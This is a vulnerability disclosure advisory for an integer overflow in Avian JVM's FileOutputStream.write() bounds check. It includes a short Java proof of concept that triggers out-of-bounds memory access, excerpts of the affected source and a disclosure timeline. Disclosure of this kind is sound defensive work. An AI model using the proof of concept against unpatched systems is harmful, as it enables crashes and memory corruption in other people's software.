Vulnerability title: Avian JVM FileOutputStream.write() Integer Overflow  
Author: Pietro Oliva  
Vendor: ReadyTalk  
Product: Avian JVM   
Affected version: 1.2.0 before 27th October 2020  
Fixed Version: 1.2.0 since 27th October 2020  
The issue is located in the FileOutputStream.write() method defined in, where a boundary check is performed in order to prevent  
out-of-bounds memory read/write. However, this check contained an integer   
overflow which leads to the same check being bypassed and out-of-bounds   
Attackers could exploit this vulnerability to read/write arbitrary content in  
the JVM memory. This could in turn result in denial of service, memory   
disclosure, or arbitrary code execution in the context of the JVM.  
The following PoC would trigger an OOB read/write and/or crash of Avian JVM:  
public class poc {  
public static void main(String[] args) throws IOException {  
byte[] data = "somedata".getBytes();  
FileDescriptor fd = new FileDescriptor().out;  
FileOutputStream fos = new FileOutputStream(fd);  
fos.write(data, 1, 0x7fffffff); // Integer overflow + OOB read/write here  
public void write(byte[] b, int offset, int length) throws IOException {  
if (b == null) {  
throw new NullPointerException();  
if (offset < 0 || offset + length > b.length) { // Integer overflow here  
throw new ArrayIndexOutOfBoundsException();  
write(fd, b, offset, length);  
extern "C" JNIEXPORT void JNICALL  
Java_java_io_FileOutputStream_write__I_3BII(JNIEnv* e,  
jint fd,  
jbyteArray b,  
jint offset,  
jint length)  
jbyte* data = static_cast<jbyte*>(malloc(length));  
if (data == 0) {  
throwNew(e, "java/lang/OutOfMemoryError", 0);  
e->GetByteArrayRegion(b, offset, length, data);  
if (not e->ExceptionCheck()) {  
doWrite(e, fd, data, length);  
void JNICALL GetByteArrayRegion(Thread* t,  
jbyteArray array,  
jint offset,  
jint length,  
jbyte* dst)  
ENTER(t, Thread::ActiveState);  
if (length) {  
// Out-of-bounds read/write here  
memcpy(dst, &(*array)->body()[offset], length * sizeof(jbyte));  
As can be observed above, offset+length can overflow in FileOutputStream.write()  
and later result in OOB read/write during memcpy() in GetByteArrayRegion().   
Mitigating factors:  
Since offset needs to be a positive integer, and length is limited to a valid  
malloc argument, there is a limited range of memory where an attacker could read  
or write as a result of this vulnerability.  
A fix has been made available with the following commit:  
Disclosure timeline:  
20th October 2020 - Vulnerability reported.  
20th October 2020 - Vulnerability acknowledged.  
20th October 2020 - CVE request sent to Mitre.  
23rd October 2020 - Sent reminder to Mitre.  
27th October 2020 - Sent reminder to Mitre.  
27th October 2020 - Patch proposed via pull request.  
27th October 2020 - Patch merged into master branch.  
29th October 2020 - Sent reminder to Mitre.  
2nd November 2020 - CVE request sent again to Mitre.  
11th November 2020 - Vulnerability details shared on fulldisclosure without CVE identifier.